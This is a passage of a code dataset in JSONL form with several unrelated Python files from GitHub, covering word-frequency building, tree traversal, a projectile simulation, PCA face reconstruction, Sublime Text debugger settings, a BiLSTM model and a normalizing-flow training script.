time_stamp data to file:\n with open('./data/time_stamp_data_luis(w2v).pkl', 'wb') as outfile:\n pickle.dump(time_stamps, outfile)\n\n\ndef build_super_words():\n \"\"\"make a dict of dict of dict : super_word[year][classifier][context]=frequency\"\"\"\n\n with open('./data/time_stamp_data_luis(w2v).pkl', 'rb') as infile:\n timestamps = pickle.load(infile)\n\n # load the list of w2v to filter out the words that are not covered by our w2v\n with open('./data/w2v-chi.pkl', 'rb') as in_file:\n word_list = pickle.load(in_file)\n\n with open('./data/super_words-chi-Luis.pkl', 'rb') as super_file:\n # super words without time data\n s_words = pickle.load(super_file)\n\n # make lists of all contexts that are also in FasText and all classifiers\n classifiers = []\n for clsf, cntx in s_words[2010].items():\n classifiers.append(clsf)\n\n # make a dict of all years and create dicts for each\n super_words = dict()\n for year in 
range(1940, 2010):\n super_words[year] = dict()\n for cat in classifiers:\n super_words[year][cat] = dict()\n\n # fill in the frequencies\n for cat, wrds in s_words[2010].items():\n for wrd in wrds:\n if cat + wrd not in timestamps or wrd not in word_list or len(wrd) < 2:\n continue\n query_ngram = cat + wrd + '_NOUN'\n for item in timestamps[cat + wrd]:\n try:\n ngram, year, freq, books = item.split('\\t')\n ngram = ngram.replace(' ', '')\n if ngram != query_ngram:\n continue\n year = int(year)\n if year in super_words:\n super_words[year][cat][wrd] = int(freq)\n except Exception as e:\n print(e)\n\n with open('./data/super_words-chi-Luis-YbyY(w2v).pkl', 'wb') as super_file:\n pickle.dump(super_words, super_file)\n\n","repo_name":"AmirAhmadHabibi/ChainingClassifiers","sub_path":"super_words_builder.py","file_name":"super_words_builder.py","file_ext":"py","file_size_in_byte":5678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24768031703","text":"from collections import defaultdict\n\nclass TreeTraversal:\n def __init__(self):\n self.graph = defaultdict(list)\n\n def dfs(self, curr, prev):\n for neighbor in self.graph[curr]:\n if neighbor != prev:\n self.dfs(neighbor, curr)\n # print(curr)\n\n def count_nodes(self, curr, prev):\n count = 1\n for neighbor in self.graph[curr]:\n if neighbor != prev:\n count += self.count_nodes(neighbor, curr)\n return count\n\n def max_length(self, curr, prev):\n \"\"\"\n max length from root to leaf\n \"\"\"\n max_so_far = 0\n for neighbor in self.graph[curr]:\n if neighbor != prev:\n max_so_far = max(max_so_far, self.max_length(neighbor, curr))\n return max_so_far + 1\n\n def add_edge(self, u, v):\n self.graph[u].append(v)\n self.graph[v].append(u)\n\n\ntt = TreeTraversal()\ntt.add_edge(1,2)\ntt.add_edge(1,3)\ntt.add_edge(1,4)\ntt.add_edge(2,5)\ntt.add_edge(2,6)\ntt.add_edge(6,8)\ntt.add_edge(4,7)\n\ntt.dfs(1, 0)\nassert tt.max_length(1, 0) == 4\nassert tt.count_nodes(1, 0) == 8\n\nclass Node:\n def __init__(self, val):\n self.left = None\n self.right = None\n self.val = val\n\nclass BinaryTree:\n def create_tree(self, nums, i):\n if i >= len(nums):\n return\n elif not nums[i]:\n return None\n node = Node(nums[i])\n node.left = self.create_tree(nums, 2*i+1)\n node.right = self.create_tree(nums, 2*i+2)\n return node\n\n def in_order(self, node, order):\n if not node:\n return\n self.in_order(node.left, order)\n order.append(node.val)\n self.in_order(node.right, order)\n\n def post_order(self, node, order):\n if not node:\n return\n self.post_order(node.left, order)\n self.post_order(node.right, order)\n order.append(node.val)\n\n def pre_order(self, node, order):\n if not node:\n return\n order.append(node.val)\n self.pre_order(node.left, order)\n self.pre_order(node.right, order)\n\nheap = [1, 2, 3, 4, 5, None, 7, None, None, 6]\nbt = BinaryTree()\nroot = bt.create_tree(heap, 0)\nin_order = []\nbt.in_order(root, in_order)\npost_order = []\nbt.post_order(root, post_order)\npre_order = []\nbt.pre_order(root, pre_order)\n\nassert in_order == [4, 2, 6, 5, 1, 3, 7]\nassert post_order == [4, 6, 5, 2, 7, 3, 1]\nassert pre_order == [1, 2, 4, 5, 6, 3, 7]\n","repo_name":"kcajheish/leetcode","sub_path":"algorithm/tree_traversal.py","file_name":"tree_traversal.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16496989237","text":"from Vectors import *\nfrom math import sin, radians, cos\nfrom Ball 
import Ball\n\nballs = []\n\nlaunch_height = 96.952\nlaunch_speed = 60\n\npi = 3.14159265359\n\nnum_balls = 40\n\nfor i in range(num_balls):\n # inputs\n # launch_angle = random(0, 90)\n dd = random(0, 500)\n\n # v = Vec(launch_speed * cos(radians(launch_angle)), launch_speed * sin(radians(launch_angle)), 0)\n v = Vec(launch_speed, 0, 0)\n launch_height = 96.952\n \n ball = Ball(launch_height, v, dd)\n balls.append(ball)\n\ng = Vec(0, -9.8, 0)\n\nm = 0.6\nFg=Vmult(g,m)\n\ndt = 0.05\n\nt = 0\n\ncounter = 0\n\nradius = 0.12\n\nairdrag_coeff = 0.5\nfront_facing_area = radius * radius * PI\nair_density = 1.2\n\nwind = Vec(-10, 0, 0)\n\nrecord_balls = []\n\nmagnus_coeff = 5e-5\nlaunch_spin = Vec(0, 0, 200)\n\n\ndef magnus_force(mc, spin, vel):\n relative_velocity = Vsub(vel, wind)\n fl = Vmult(Vcprod(spin, relative_velocity), mc)\n return fl\n\ndef airdrag(velocity, adc, ffa, ad):\n relative_velocity = Vsub(velocity, wind)\n fd = -0.5 * adc * ffa * ad * Vmag(relative_velocity) * Vmag(relative_velocity)\n return Vmult(Norm(velocity), fd)\n\ndef move():\n global t, dt, max_height, record_balls, balls, new_balls, counter, launch_height\n \n if len(balls) == 0:\n # sort balls in order of greatest to least distance\n sorted_balls = sorted(record_balls, key=lambda x:x[1])\n \n new_balls = []\n \n # get 5 best performing balls\n for i in range(5):\n dd = sorted_balls[i][0]\n # v = Vec(launch_speed * cos(radians(ang)), launch_speed * sin(radians(ang)), 0)\n new_balls.append(Ball(launch_height, Vec(60, 0, 0), dd))\n \n for i in range(5):\n std = 10 - counter * 0.5\n old = new_balls[i].drop\n launch_height = 96.952\n # make 7 kids per ball\n for j in range(num_balls//5-1):\n # using inverse standard normal distribution\n new = sqrt(-2 * log(random(0, 1))) * cos(2 * pi * random(0, 1)) * std + old\n # ang = random(theta-3+counter*0.6, theta+3-counter*0.4)\n v = Vec(60, 0, 0)\n new_balls.append(Ball(launch_height, v, new))\n \n balls = [x for x in new_balls]\n \n counter += 1\n\n print(\"Generation: \" + str(counter))\n print(\"Height: \" + str(launch_height))\n print(\"Drop: \" + str(sorted_balls[0][0]))\n print(\"Time: \" + str(sorted_balls[0][0]/60))\n print(\"Dist From 200: \" + str(sorted_balls[0][1]))\n print(\" \")\n \n # print(len(balls))\n \n # print(len(balls))\n \n # actually applies force and moves each ball\n for ball in balls:\n \n # F = Vadd(Fg, airdrag(ball.vel, airdrag_coeff, front_facing_area, air_density), magnus_force(magnus_coeff, launch_spin, ball.vel))\n F = Vadd(Fg, airdrag(ball.vel, airdrag_coeff, front_facing_area, air_density))\n a = Vdiv(F, m)\n ball.updateVel(a, dt)\n ball.move(dt)\n \n t += dt\n \n # if ball is on ground remove from list and record it\n if ball.pos.y <= 0:\n record_balls.append([ball.drop, abs(200-ball.pos.x)])\n balls.remove(ball)\n \n return balls\n \n \n","repo_name":"jbajaj6/processing_comp_phys","sub_path":"dpps/Engine.py","file_name":"Engine.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"41581604942","text":"''' Approach used in my code -> the formula for permutations with repeated elements\n# Formula for permutations with repetition\nThe number of ways to arrange elements that include duplicates is the factorial of the total count divided by the factorial of each duplicated element's count.\nFor example, for aaabb there are three a's and two b's, so divide 5! by 3! and 2!.\nex) [a, a, a, b, b] -> 5! / 3!2! = 10\n'''\n\ndef solution(n):\n res = 0\n dp_facto = [1]*(n+1)\n for i in range(2, n+1):\n dp_facto[i] = dp_facto[i-1]*i\n \n for i in range(n//2 + 1):\n cntOne = n - i*2\n arr = [1]*cntOne + [2]*i\n if all(x == 1 for x in arr) or all(x == 2 for x in arr):\n res += 1\n else:\n res += dp_facto[len(arr)] // (dp_facto[cntOne] * dp_facto[i])\n return res % 1234567\n\n####################################################################################################\n\n''' Another person's solution -> using the Fibonacci sequence\nChecking some of this problem's test cases:\nn = 1, result = 1\nn = 2, result = 2\nn = 3, result = 3\nn = 4, result = 5\nn = 5, result = 8\nn = 6, result = 13\nn = 7, result = 21\nn = 8, result = 34\nThe results for n = 1 through n = 8 are as above.\n\n1, 2, 3, 5, 8, 13, 21, 34 ... -> this looks like the Fibonacci sequence.\nPrepending a single 1 to this sequence gives the Fibonacci sequence itself:\n1, 1, 2, 3, 5, 8, 13, 21, 34 ...\n=> 1, 1, (1+1), (1+2), (2+3), (3+5), (5+8), (8+13), (13+21)\nSo implement the Fibonacci sequence with DP.\n\n# Second version based on the explanation above\ndef solution(n):\n dp_fibo = [0] * (n+2)\n dp_fibo[1], dp_fibo[2] = 1, 1\n for i in range(3, n+2):\n dp_fibo[i] = dp_fibo[i-1] + dp_fibo[i-2]\n \n return dp_fibo[n+1] % 1234567\n'''","repo_name":"hongii/programmers_python","sub_path":"LV 2/멀리 뛰기.py","file_name":"멀리 뛰기.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"43785616226","text":"import numpy as np\r\nfrom skimage import io\r\nimport sys\r\n'''\r\nimport os\r\n\r\na=os.path.join(sys.argv[1])\r\nprint(type(a))\r\nprint(len(a))\r\nprint(a)\r\nprint(b)\r\n'''\r\nprint(\"reading face\")\r\nrow_img = []\r\nfor i in range(415):\r\n row_img.append(io.imread(str(sys.argv[1])+\"/\"+str(i)+\".jpg\").reshape(600*600*3)*1.0)\r\nrow_img = np.array(row_img)\r\n\r\nprint(\"making average face\")\r\naverage_img = []\r\nfor i in range(600*600*3):\r\n average_img.append(np.sum(row_img[:, i])*1.0/415.0)\r\naverage_img = np.array(average_img)\r\n\r\nprint(\"computing SVD\")\r\nimg = []\r\nfor i in range(415):\r\n row_img[i] -= average_img\r\n img.append(row_img[i].reshape(600*600*3))\r\nimg = np.array(img)\r\nU, S, V = np.linalg.svd(img, full_matrices=False)\r\n\r\nprint(\"reconstruct\")\r\ntest_picture = io.imread(str(sys.argv[1])+\"/\"+sys.argv[2]).reshape(600*600*3)*1.0-average_img.reshape(600*600*3)\r\nprojection = np.dot(test_picture, V.T)\r\nprojection_4 = np.zeros(415)\r\nprojection_4[0:4] = projection[0:4]\r\nreconstruct_img = np.dot(projection_4, V) + average_img\r\nreconstruct_img -= np.min(reconstruct_img)\r\nreconstruct_img /= np.max(reconstruct_img)\r\nreconstruct_img = (reconstruct_img * 255).astype(np.uint8)\r\nreconstruct_img = reconstruct_img.reshape((600, 600, 3))\r\nio.imsave(\"reconstruction.jpg\", reconstruct_img)\r\n","repo_name":"R06942082/ML2017FALL","sub_path":"hw6/hw6_pca.py","file_name":"hw6_pca.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
+{"seq_id":"20088577567","text":"DEFAULT_PORT = 4242 #9000\nDEFAULT_IDE_KEY = 'sublime.grld'\n\nPACKAGE_PATH = None\nPACKAGE_FOLDER = None\n\nFILE_LOG_OUTPUT = 'GRLD.log'\nFILE_BREAKPOINT_DATA = 'GRLD.breakpoints'\nFILE_PACKAGE_SETTINGS = 'GRLD.sublime-settings'\nFILE_WATCH_DATA = 'GRLD.expressions'\n\nKEY_SETTINGS = 'settings'\nKEY_GRLD = 'grld'\n\nKEY_PATH_MAPPING = \"path_mapping\"\nKEY_IDE_KEY = \"ide_key\"\nKEY_PORT = \"port\"\nKEY_SUPER_GLOBALS = \"super_globals\"\nKEY_MAX_DATA = \"max_data\"\nKEY_MAX_DEPTH = 
\"max_depth\"\nKEY_BREAK_ON_START = \"break_on_start\"\nKEY_BREAK_ON_EXCEPTION = \"break_on_exception\"\nKEY_CLOSE_ON_STOP = \"close_on_stop\"\nKEY_DISABLE_LAYOUT = \"disable_layout\"\nKEY_DEBUG_LAYOUT = \"debug_layout\"\nKEY_DISABLE_SUBLIME_LINTER_GUTTER = \"disable_sublime_linter_gutter\"\n\nKEY_BREAKPOINT_GROUP = \"breakpoint_group\"\nKEY_BREAKPOINT_INDEX = \"breakpoint_index\"\nKEY_CONTEXT_GROUP = \"context_group\"\nKEY_CONTEXT_INDEX = \"context_index\"\nKEY_STACK_GROUP = \"stack_group\"\nKEY_STACK_INDEX = \"stack_index\"\nKEY_WATCH_GROUP = \"watch_group\"\nKEY_WATCH_INDEX = \"watch_index\"\nKEY_COROUTINES_GROUP = \"coroutines_group\"\nKEY_COROUTINES_INDEX = \"coroutines_index\"\nKEY_EVALUATE_GROUP = \"evaluate_group\"\nKEY_EVALUATE_INDEX = \"evaluate_index\"\nKEY_ICONS_GROUP = \"icons_group\"\nKEY_ICONS_INDEX = \"icons_index\"\n\n\nKEY_BREAKPOINT_CURRENT = 'breakpoint_current'\nKEY_BREAKPOINT_DISABLED = 'breakpoint_disabled'\nKEY_BREAKPOINT_ENABLED = 'breakpoint_enabled'\nKEY_CURRENT_LINE = 'current_line'\n\nKEY_PYTHON_PATH = \"python_path\"\nKEY_DEBUG = \"debug\"\n\n# Region scope sources\nREGION_KEY_BREAKPOINT = 'grld_breakpoint'\nREGION_KEY_CURRENT = 'grld_current'\nREGION_KEY_DISABLED = 'grld_disabled'\nREGION_SCOPE_BREAKPOINT = 'comment.line.settings'\nREGION_SCOPE_CURRENT = 'string.quoted.settings'\n\n# Window layout for debugging output\nLAYOUT_DEBUG = {\n \"cols\": [0.0, 0.05, 0.15, 0.6, 1.0],\n \"rows\": [0.0, 0.7, 1.0],\n\t# main coroutines context stack icons\n \"cells\": [[1, 0, 4, 1], [0, 1, 2, 2], [2, 1, 3, 2], [3, 1, 4, 2], [0, 0, 1, 1]]\n}\n\n# Default single layout (similar to Alt+Shift+1)\nLAYOUT_NORMAL = {\n \"cols\": [0.0, 1.0],\n \"rows\": [0.0, 1.0],\n \"cells\": [[0, 0, 1, 1]]\n}\n\nRESTORE_LAYOUT = None\nRESTORE_INDEX = None\n\nSESSION_BUSY = False\n\nPROTOCOL = None\nBREAKPOINT = {}\nCONTEXT_DATA = {}\nWATCH = []\n\nBREAKPOINT_EXCEPTION = None\n# Breakpoint line number in script being debugged\nBREAKPOINT_ROW = None\n# Placholder for temporary breakpoint filename and line number\nBREAKPOINT_RUN = None\n# Will hold breakpoint line number to show for file which is being loaded\nSHOW_ROW_ONLOAD = {}\n\nCONFIG_PROJECT = None\nCONFIG_PACKAGE = None\nCONFIG_KEYS = [\n\tKEY_PATH_MAPPING,\n\tKEY_IDE_KEY,\n\tKEY_PORT,\n\tKEY_SUPER_GLOBALS,\n\tKEY_MAX_DATA,\n\tKEY_MAX_DEPTH,\n\tKEY_BREAK_ON_START,\n\tKEY_BREAK_ON_EXCEPTION,\n\tKEY_CLOSE_ON_STOP,\n\tKEY_DISABLE_LAYOUT,\n\tKEY_DEBUG_LAYOUT,\n\tKEY_BREAKPOINT_GROUP,\n\tKEY_BREAKPOINT_INDEX,\n\tKEY_CONTEXT_GROUP,\n\tKEY_CONTEXT_INDEX,\n\tKEY_STACK_GROUP,\n\tKEY_STACK_INDEX,\n\tKEY_WATCH_GROUP,\n\tKEY_WATCH_INDEX,\n\tKEY_BREAKPOINT_CURRENT,\n\tKEY_BREAKPOINT_DISABLED,\n\tKEY_BREAKPOINT_ENABLED,\n\tKEY_CURRENT_LINE,\n\tKEY_PYTHON_PATH,\n\tKEY_DEBUG\n]","repo_name":"robinvierich/SublimeTextGRLD","sub_path":"grld/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36076737898","text":"# import torch.nn as nn\n# import torch\n# from torch.autograd import *\n# import torch.optim as optim\n# import torch.nn.functional as F\n# import matplotlib.pyplot as plt\n\n\n\n# import pandas as pd\n# # import numpy as np\n# df=pd.read_csv(\"make_csv.csv\")\n#\n# train=df[df.columns[:3]]\n# y_train=df[df.columns[3:]]\n# train.shape,y_train.shape\n#\n# from sklearn.model_selection import train_test_split\n# train_x,test_x, train_y,test_y = train_test_split(train.values.reshape(-1,1,3), y_train.values, 
test_size=0.2, random_state=42)\n\n# Bilstm model\nimport torch.nn as nn\nimport torch\nfrom torch.autograd import *\n# import torch.optim as optim\n# import torch.nn.functional as F\n# import matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass BiLSTMNet(nn.Module):\n\n def __init__(self, input_size):\n super(BiLSTMNet, self).__init__()\n self.rnn = nn.LSTM(\n input_size=input_size,\n hidden_size=32,\n num_layers=1,\n batch_first=True,\n bidirectional=True\n )\n self.out = nn.Sequential(\n nn.Linear(64, 2)\n )\n\n def forward(self, x):\n r_out, (h_n, h_c) = self.rnn(x.view(len(x), 1, -1)) # no initial state passed: the hidden state defaults to all zeros\n out = self.out(r_out[:, -1])\n # print(out.shape)\n return out\n\n\ndef ToVariable(x):\n tmp = torch.FloatTensor(x)\n return Variable(tmp)\n\n\n\n# net = BiLSTMNet(test_x.shape[-1])\n# criterion = nn.MSELoss()\n# optimizer = torch.optim.Adam(net.parameters(), lr=0.0001, weight_decay=0.001)\n\n\nimport joblib\nif __name__ == \"__main__\":\n net=joblib.load(filename=\"bilstm_model.joblib\")\n\n\n\ndef pre(x):\n x=x.reshape(-1,1,3)\n var_x = ToVariable(x)\n out = net(var_x)\n return out.detach().numpy()\n\n# print(pre(test_x))\n\n\ntest=np.array([0.5,1,1])\n\nprint(pre(test))\n\n\n","repo_name":"danielzph/hello_pytorch","sub_path":"example_use_pytorch/import-lstm_test.py","file_name":"import-lstm_test.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
+{"seq_id":"32662823936","text":"import argparse\nimport json\nimport numpy as np\nimport torch\nimport os\nimport tensorflow as tf\n\n# from tensorboardX import SummaryWriter\nfrom time import sleep\nfrom torch import optim\nfrom torch.nn import functional as F\nfrom torch.nn.utils import clip_grad_norm_\nfrom torch.utils import data\nfrom tqdm import tqdm\n\nimport data as data_\nimport nn as nn_\nimport utils\nimport datetime\nimport struct\nimport glob\nimport scipy.io  # fix: scipy.io.loadmat is used below and needs an explicit submodule import\n\nfrom experiments import cutils\nfrom nde import distributions, flows, transforms\n\nclass parser_:\n pass\nargs = parser_()\n# parser = argparse.ArgumentParser()\n\n# data\n# parser.add_argument('--dataset_name', type=str, default='miniboone',\n# choices=['power', 'gas', 'hepmass', 'miniboone', 'bsds300'],\n# help='Name of dataset to use.')\nargs.dataset_name = 'cifar10'\n# parser.add_argument('--train_batch_size', type=int, default=64,\n# help='Size of batch used for training.')\nargs.train_batch_size = 64\n# parser.add_argument('--val_frac', type=float, default=1.,\n# help='Fraction of validation set to use.')\nargs.val_frac = 0.2\n\n# parser.add_argument('--val_batch_size', type=int, default=512,\n# help='Size of batch used for validation.')\nargs.val_batch_size=128\n# optimization\n# parser.add_argument('--learning_rate', type=float, default=3e-4,\n# help='Learning rate for optimizer.')\nargs.learning_rate = 3e-4\n# parser.add_argument('--num_training_steps', type=int, default=200000,\n# help='Number of total training steps.')\nargs.num_training_steps = 200000\n# parser.add_argument('--anneal_learning_rate', type=int, default=1,\n# choices=[0, 1],\n# help='Whether to anneal the learning rate.')\nargs.anneal_learning_rate = 1\n# parser.add_argument('--grad_norm_clip_value', type=float, default=5.,\n# help='Value by which to clip norm of gradients.')\nargs.grad_norm_clip_value = 5.\n# flow details\n# parser.add_argument('--base_transform_type', type=str, default='rq-autoregressive',\n# choices=['affine-coupling', 'quadratic-coupling', 'rq-coupling',\n# 
'affine-autoregressive', 'quadratic-autoregressive',\n# 'rq-autoregressive'],\n# help='Type of transform to use between linear layers.')\nargs.base_transform_type = 'rq-autoregressive'\n# parser.add_argument('--linear_transform_type', type=str, default='lu',\n# choices=['permutation', 'lu', 'svd'],\n# help='Type of linear transform to use.')\nargs.linear_transform_type = 'lu'\n# parser.add_argument('--num_flow_steps', type=int, default=10,\n# help='Number of blocks to use in flow.')\nargs.num_flow_steps = 5\n# parser.add_argument('--hidden_features', type=int, default=256,\n# help='Number of hidden features to use in coupling/autoregressive nets.')\nargs.hidden_features = 256\n# parser.add_argument('--tail_bound', type=float, default=3,\n# help='Box is on [-bound, bound]^2')\nargs.tail_bound = 3\n# parser.add_argument('--num_bins', type=int, default=8,\n# help='Number of bins to use for piecewise transforms.')\nargs.num_bins = 8\n# parser.add_argument('--num_transform_blocks', type=int, default=2,\n# help='Number of blocks to use in coupling/autoregressive nets.')\nargs.num_transform_blocks=2\n# parser.add_argument('--use_batch_norm', type=int, default=0,\n# choices=[0, 1],\n# help='Whether to use batch norm in coupling/autoregressive nets.')\nargs.use_batch_norm = 0\n# parser.add_argument('--dropout_probability', type=float, default=0.25,\n# help='Dropout probability for coupling/autoregressive nets.')\nargs.dropout_probability = 0\n# parser.add_argument('--apply_unconditional_transform', type=int, default=1,\n# choices=[0, 1],\n# help='Whether to unconditionally transform \\'identity\\' '\n# 'features in coupling layer.')\nargs.apply_unconditional_transform = 1\n# logging and checkpoints\n# parser.add_argument('--monitor_interval', type=int, default=250,\n# help='Interval in steps at which to report training stats.')\nargs.monitor_interval = 25#0\n# reproducibility\n# parser.add_argument('--seed', type=int, default=1638128,\n# help='Random seed for PyTorch and NumPy.')\nargs.seed = 1638128\n# args = parser.parse_args()\nargs.activation = F.tanh\nargs.stop_cntr = 15\nargs.step_lim = 5000 ## num of steps after which to record best model\n\ntimestamp = str(datetime.datetime.now())[:-7].replace(' ', '-').replace(':', '-')\npath = os.path.join('checkpoint', '{}_steps{}_baseXfm{}_linXfm{}_h{}_BN{}_Blocks{}_UconXfm{}_{}'.format(\n args.dataset_name,\n args.num_flow_steps, args.base_transform_type, args.linear_transform_type, int(args.hidden_features), int(args.use_batch_norm), args.num_transform_blocks,\n int(args.apply_unconditional_transform),\n timestamp))\ntry:\n os.mkdir(path)\nexcept:\n pass\nrun_dir = os.path.join(r'C:\\Users\\justjo\\PycharmProjects\\nsf', path)\n# SummaryWriter = tf.summary.SummaryWriter\n\ntorch.manual_seed(args.seed)\nnp.random.seed(args.seed)\n\nassert torch.cuda.is_available()\ndevice = torch.device('cuda')\ntorch.set_default_tensor_type('torch.cuda.FloatTensor')\n\n# create data\n# train_dataset = data_.load_dataset(args.dataset_name, split='train')\n# train_loader = data.DataLoader(\n# train_dataset,\n# batch_size=args.train_batch_size,\n# shuffle=True,\n# drop_last=True\n# )\n# train_generator = data_.batch_generator(train_loader)\n# test_batch = next(iter(train_loader)).to(device)\n#\n# # validation set\n# val_dataset = data_.load_dataset(args.dataset_name, split='val', frac=args.val_frac)\n# val_loader = data.DataLoader(\n# dataset=val_dataset,\n# batch_size=args.val_batch_size,\n# shuffle=True,\n# drop_last=True\n# )\n#\n# # test set\n# test_dataset = 
data_.load_dataset(args.dataset_name, split='test')\n# test_loader = data.DataLoader(\n# dataset=test_dataset,\n# batch_size=args.val_batch_size,\n# shuffle=False,\n# drop_last=False\n# )\n############## MNIST ####################\n# def read_idx(filename):\n# with open(filename, 'rb') as f:\n# zero, data_type, dims = struct.unpack('>HBB', f.read(4))\n# shape = tuple(struct.unpack('>I', f.read(4))[0] for d in range(dims))\n# return np.fromstring(f.read(), dtype=np.uint8).reshape(shape)\n#\n# dtrain = read_idx(r'C:\\Users\\justjo\\Downloads\\public_datasets/FasionMNIST/train-images-idx3-ubyte')\n# dtrain = dtrain.reshape((dtrain.shape[0],-1))/128. - 1.\n# train_idx = np.arange(dtrain.shape[0])\n# np.random.shuffle(train_idx)\n#\n# dtest = read_idx(r'C:\\Users\\justjo\\Downloads\\public_datasets/FasionMNIST/t10k-images-idx3-ubyte')\n# dtest = dtest.reshape((dtest.shape[0],-1))/128. - 1.\n#\n# # fnames_data = [r'C:\\Users\\justjo\\Downloads\\public_datasets/MNIST/train-images.idx3-ubyte', r'C:\\Users\\justjo\\Downloads\\public_datasets/MNIST/t10k-images.idx3-ubyte']\n# # cont_data = []\n# # for f in fnames_data:\n# # cont_data.append(read_idx(f))\n# # cont_data = np.concatenate(cont_data)\n# cont_data = read_idx(r'C:\\Users\\justjo\\Downloads\\public_datasets/MNIST/t10k-images.idx3-ubyte')\n# cont_data = cont_data.reshape((cont_data.shape[0],-1))/128. - 1.\n# # cont_data = cont_data[np.random.choice(cont_data.shape[0],10000, False), :]\n########### CIFAR10 ###############################\nfnames_cifar = glob.glob(r'C:\\Users\\justjo\\Downloads\\public_datasets\\cifar-10-python\\cifar-10-batches-py\\train\\*')\ndtrain=[np.load(f, allow_pickle=True, encoding='latin1') for f in fnames_cifar]\ndtrain = np.concatenate([a['data'] for a in dtrain])/128. - 1.\ntrain_idx = np.arange(dtrain.shape[0])\nnp.random.shuffle(train_idx)\n\ndtest = np.load(r'C:\\Users\\justjo\\Downloads\\public_datasets\\cifar-10-python\\cifar-10-batches-py\\test\\test_batch', allow_pickle=True, encoding='latin1')\ndtest = dtest['data']/128. - 1.\n\ncont_data = scipy.io.loadmat(r'C:\\Users\\justjo\\Downloads\\public_datasets\\SVHN.mat')\ncont_data = np.moveaxis(cont_data['X'],3,0)\ncont_data = np.reshape(cont_data, (cont_data.shape[0],-1))/128. 
- 1.\n# cont_data = cont_data[np.random.choice(cont_data.shape[0],10000, False), :]\n#################################################\n\ntrain_dataset = torch.utils.data.TensorDataset(\n torch.from_numpy(dtrain[train_idx[:-int(args.val_frac*dtrain.shape[0])]]).float())\n# train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=args.train_batch_size, shuffle=True)\ntrain_loader = data.DataLoader(\n train_dataset,\n batch_size=args.train_batch_size,\n shuffle=True,\n drop_last=True\n)\ntrain_generator = data_.batch_generator(train_loader)\ntest_batch = next(iter(train_loader))[0].to(device)\n\nval_dataset = torch.utils.data.TensorDataset(\n torch.from_numpy(dtrain[train_idx[-int(args.val_frac*dtrain.shape[0]):]]).float())\n# val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=args.val_batch_size, shuffle=True)\nval_loader = data.DataLoader(\n dataset=val_dataset,\n batch_size=args.val_batch_size,\n shuffle=True,\n drop_last=True\n)\nval_generator = data_.batch_generator(val_loader)\n\ntest_dataset = torch.utils.data.TensorDataset(\n torch.from_numpy(dtest).float())\n# test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=args.val_batch_size, shuffle=False)\ntest_loader = data.DataLoader(\n dataset=test_dataset,\n batch_size=args.val_batch_size,\n shuffle=False,\n drop_last=False\n)\ntest_generator = data_.batch_generator(test_loader)\n\ncont_dataset = torch.utils.data.TensorDataset(\n torch.from_numpy(cont_data).float())\n# test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=args.val_batch_size, shuffle=False)\ncont_loader = data.DataLoader(\n dataset=cont_dataset,\n batch_size=args.val_batch_size,\n shuffle=False,\n drop_last=False\n)\ncont_generator = data_.batch_generator(cont_loader)\n\nfeatures = test_batch.shape[1]\n# features = train_dataset.dim\n\ndef create_linear_transform():\n if args.linear_transform_type == 'permutation':\n return transforms.RandomPermutation(features=features)\n elif args.linear_transform_type == 'lu':\n return transforms.CompositeTransform([\n transforms.RandomPermutation(features=features),\n transforms.LULinear(features, identity_init=True)\n ])\n elif args.linear_transform_type == 'svd':\n return transforms.CompositeTransform([\n transforms.RandomPermutation(features=features),\n transforms.SVDLinear(features, num_householder=10, identity_init=True)\n ])\n else:\n raise ValueError\n\n\ndef create_base_transform(i):\n if args.base_transform_type == 'affine-coupling':\n return transforms.AffineCouplingTransform(\n mask=utils.create_alternating_binary_mask(features, even=(i % 2 == 0)),\n transform_net_create_fn=lambda in_features, out_features: nn_.ResidualNet(\n in_features=in_features,\n out_features=out_features,\n hidden_features=args.hidden_features,\n context_features=None,\n num_blocks=args.num_transform_blocks,\n activation=args.activation,\n dropout_probability=args.dropout_probability,\n use_batch_norm=args.use_batch_norm\n )\n )\n elif args.base_transform_type == 'quadratic-coupling':\n return transforms.PiecewiseQuadraticCouplingTransform(\n mask=utils.create_alternating_binary_mask(features, even=(i % 2 == 0)),\n transform_net_create_fn=lambda in_features, out_features: nn_.ResidualNet(\n in_features=in_features,\n out_features=out_features,\n hidden_features=args.hidden_features,\n context_features=None,\n num_blocks=args.num_transform_blocks,\n activation=args.activation,\n dropout_probability=args.dropout_probability,\n use_batch_norm=args.use_batch_norm\n ),\n num_bins=args.num_bins,\n 
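# added note: with tails='linear' the piecewise spline acts as the identity outside [-tail_bound, tail_bound], as in the neural spline flows construction\n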
tails='linear',\n tail_bound=args.tail_bound,\n apply_unconditional_transform=args.apply_unconditional_transform\n )\n elif args.base_transform_type == 'rq-coupling':\n return transforms.PiecewiseRationalQuadraticCouplingTransform(\n mask=utils.create_alternating_binary_mask(features, even=(i % 2 == 0)),\n transform_net_create_fn=lambda in_features, out_features: nn_.ResidualNet(\n in_features=in_features,\n out_features=out_features,\n hidden_features=args.hidden_features,\n context_features=None,\n num_blocks=args.num_transform_blocks,\n activation=args.activation,\n dropout_probability=args.dropout_probability,\n use_batch_norm=args.use_batch_norm\n ),\n num_bins=args.num_bins,\n tails='linear',\n tail_bound=args.tail_bound,\n apply_unconditional_transform=args.apply_unconditional_transform\n )\n elif args.base_transform_type == 'affine-autoregressive':\n return transforms.MaskedAffineAutoregressiveTransform(\n features=features,\n hidden_features=args.hidden_features,\n context_features=None,\n num_blocks=args.num_transform_blocks,\n 